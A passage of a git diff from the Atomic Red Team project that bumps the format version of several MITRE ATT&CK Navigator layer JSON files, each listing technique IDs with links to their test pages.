@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
index 9959b6ba..74d69334 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Iaas:AWS)","description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Iaas:AWS)","description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
index 046918fc..89eec315 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
index 0a1bfbf4..81629dab 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Iaas:GCP)","description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Iaas:GCP)","description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
index b6136576..df846570 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index 09d2ec05..47f5e3e8 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"